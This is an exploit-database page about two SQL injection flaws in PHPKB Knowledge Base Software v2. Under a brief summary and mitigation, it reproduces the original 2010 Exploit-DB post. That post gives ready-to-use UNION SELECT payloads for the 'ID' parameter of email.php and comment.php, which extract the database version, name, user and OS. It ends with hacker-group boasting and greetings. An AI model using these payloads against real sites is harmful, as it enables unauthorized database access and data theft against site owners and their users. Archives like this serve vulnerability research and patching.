header-logo
Suggest Exploit
vendor:
PHPKB Knowledge Base Software
by:
R3d-D3v!L
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHPKB Knowledge Base Software
Affected Version From: v2 Multilanguage Support
Affected Version To: v2 Multilanguage Support
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

PHPKB Knowledge Base Software v2 Multilanguage Support Multi SQL Injection Vulnerabilities

Two SQL Injection vulnerabilities were discovered in PHPKB Knowledge Base Software v2 Multilanguage Support. The first vulnerability is located in the 'email.php' file with the vulnerable parameter 'ID'. The second vulnerability is located in the 'comment.php' file with the vulnerable parameter 'ID'. An attacker can inject malicious SQL queries to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

[+] {In The Name Of Allah The Mercifull}
[+]
[~] Tybe: PHPKB Knowledge Base Software v2 Multilanguage Support Multi SQL Injection Vulnerabilities
[~] Vendor: www.knowledgebase-script.com
[+] Software:PHPKB Knowledge Base Software v2 Multilanguage Support
[-]
[+] author: ((R3d-D3v!L))
[~]

[+] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY ---->((4.!.5))
[~]

[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 04:15 am GMT
[?] Home: © Offensive Security
[?]
[?]
[-]{DEV!L'5 of SYST3M}

======================================================================================
# SQL Injection #1 - email.php ID
======================================================================================
[*] Err0r C0N50L3:
http://127.0.0.1/email.php?ID={EV!L EXPLO!T}

[*]{EV!L EXPLO!T}
1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*

======================================================================================
# SQL Injection #2 - comment.php ID
======================================================================================
[*] Err0r C0N50L3:
http://127.0.0.1/comment.php?ID=EV!L EXPLO!T

[*]{EV!L EXPLO!T}
-1+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*



N073:

REAL RED DEV!L W@S h3r3 LAMERZ

GAZA !N our hearts !


[~]-----------------------------{((MAGOUSH-87))}------------------------------------------------#
#
[~] Greetz tO: [dolly &MERNA &DEV!L_MODY &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] #
#
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ #
#
[~] spechial thanks : ((HITLER JEDDAH & S!R TOTT! & DR.DAShER)) #
#
[?]spechial SupP0RT : MY M!ND # © Offensive Security #
#
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t)) #
#
[~]spechial FR!ND: 0r45hy #
#
[~] !'M 4R48!4N 3XPL0!73R. #
#
[~]{[(D!R 4ll 0R D!E)]}; #
#
[~]--------------------------------------------------------------------------------------------- #

Navigation

Suggest Exploit

Services By CQR